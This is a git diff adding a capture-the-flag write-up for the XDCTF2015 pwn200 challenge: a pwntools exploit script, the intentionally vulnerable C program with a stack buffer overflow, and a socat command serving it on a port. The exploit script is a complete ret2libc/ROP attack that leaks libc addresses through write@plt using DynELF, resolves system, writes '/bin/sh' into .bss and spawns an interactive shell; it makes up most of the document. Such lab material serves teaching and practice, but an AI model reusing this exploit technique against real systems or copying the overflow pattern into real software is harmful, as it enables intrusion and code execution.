finish 4.8

src/writeup/6.3_pwn_xdctf2015_pwn200/exp_use_dynelf.py

@@ -0,0 +1,47 @@
+from pwn import *
+
+# context.log_level = 'debug'
+
+elf = ELF('./pwn200')
+io = process('./pwn200')
+io.recvline()
+
+write_plt = elf.plt['write']
+write_got = elf.got['write']
+read_plt = elf.plt['read']
+read_got = elf.got['read']
+
+vuln_addr = 0x08048484
+start_addr = 0x080483d0
+bss_addr = 0x0804a020
+pppr_addr = 0x0804856c
+
+def leak(addr):
+    payload  = "A" * 112
+    payload += p32(write_plt)
+    payload += p32(vuln_addr)
+    payload += p32(1)
+    payload += p32(addr)
+    payload += p32(4)
+    io.send(payload)
+    data = io.recv()
+    log.info("leaking: 0x%x --> %s" % (addr, (data or '').encode('hex')))
+    return data
+
+d = DynELF(leak, elf=elf)
+system_addr = d.lookup('system', 'libc')
+log.info("system address: 0x%x" % system_addr)
+
+payload  = "A" * 112
+payload += p32(read_plt)
+payload += p32(pppr_addr)
+payload += p32(0)
+payload += p32(bss_addr)
+payload += p32(8)
+payload += p32(system_addr)
+payload += p32(vuln_addr)
+payload += p32(bss_addr)
+
+io.send(payload)
+io.send('/bin/sh\x00')
+io.interactive()

src/writeup/6.3_pwn_xdctf2015_pwn200/pwn200.c

@@ -0,0 +1,19 @@
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+
+void vuln()
+{
+    char buf[100];
+    setbuf(stdin, buf);
+    read(0, buf, 256);
+}
+int main()
+{
+    char buf[100] = "Welcome to XDCTF2015~!\n";
+
+    setbuf(stdout, buf);
+    write(1, buf, strlen(buf));
+    vuln();
+    return 0;
+}

src/writeup/6.3_pwn_xdctf2015_pwn200/run.sh

@@ -0,0 +1 @@
+socat tcp4-listen:10001,reuseaddr,fork exec:./a.out &